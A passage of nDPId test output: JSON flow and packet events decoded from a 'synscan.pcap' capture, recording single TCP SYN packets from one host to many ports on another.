+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsa6EAACwGsNGsEAAIQA2GNIzTDOXdU4MZAAAAAGACBAAnpwAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8IAADkGn7CsEAAIQA2GNIzTAKPdU4MZAAAAAGACCAAv6QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHD8AADUG9zOsEAAIQA2GNIzTgAzdU4MZAAAAAGACCACwfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAAC0G\/vGsEAAIQA2GNIzTHufdU4MZAAAAAGACCAARpQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAszKQAACgGU86sEAAIQA2GNIzTH6TdU4MZAAAAAGACBAAU6AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4YAADUGr+ysEAAIQA2GNIzTB0bdU4MZAAAAAGACCAApRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKsAACcGrMesEAAIQA2GNIzTJtjdU4MZAAAAAGACEAABtAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VwAADcGHBasEAAIQA2GNIzTK2fdU4MZAAAAAGACEAD9JAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMIAACsG\/LCsEAAIQA2GNIzTAobdU4MZAAAAAGACEAAmBgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/RQAADUGFl6sEAAIQA2GNIzSFxLdUoMYAAAAAGACCAAZfQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsApgAADUGENusEAAIQA2GNIzSCPDdUoMYAAAAAGACCAAnnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAscmgAADsGmwqsEAAIQA2GNIzSBrfdUoMYAAAAAGACEAAh2AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/kAADQGmHmsEAAIQA2GNIzSJMrdUoMYAAAAAGACBAAPxQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJwAAC8GyNasEAAIQA2GNIzSJxDdUoMYAAAAAGACEAABfwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FAAADkGPyKsEAAIQA2GNIzSTj\/dUoMYAAAAAGACCADiTwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsew8AAC4Gn2OsEAAIQA2GNIzSEdfdUoMYAAAAAGACDAAauAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAso\/UAADkGa32sEAAIQA2GNIzSIAHdUoMYAAAAAGACCAAQjgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEAAAC4GejKsEAAIQA2GNIzSBSrdUoMYAAAAAGACDAAnZQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFkAADUGaxmsEAAIQA2GNIzSAAPdUoMYAAAAAGACCAAwjAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHIAACYGXgCsEAAIQA2GNIzSBuHdUoMYAAAAAGACDAAlrgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsDk0AACcGEyasEAAIQA2GNIzSKUbdUoMYAAAAAGACEAD\/SAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsp10AAC8GchWsEAAIQA2GNIzSBJHdUoMYAAAAAGACEAAj\/gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsnbsAADAGeresEAAIQA2GNIzSJATdUoMYAAAAAGACBAAQiwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ54AAC0G89SsEAAIQA2GNIzTA+fdU4MZAAAAAGACCAAspQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsac0AADIGrKWsEAAIQA2GNIzTBEDdU4MZAAAAAGACDAAoTAAAAgQFtA=="} 
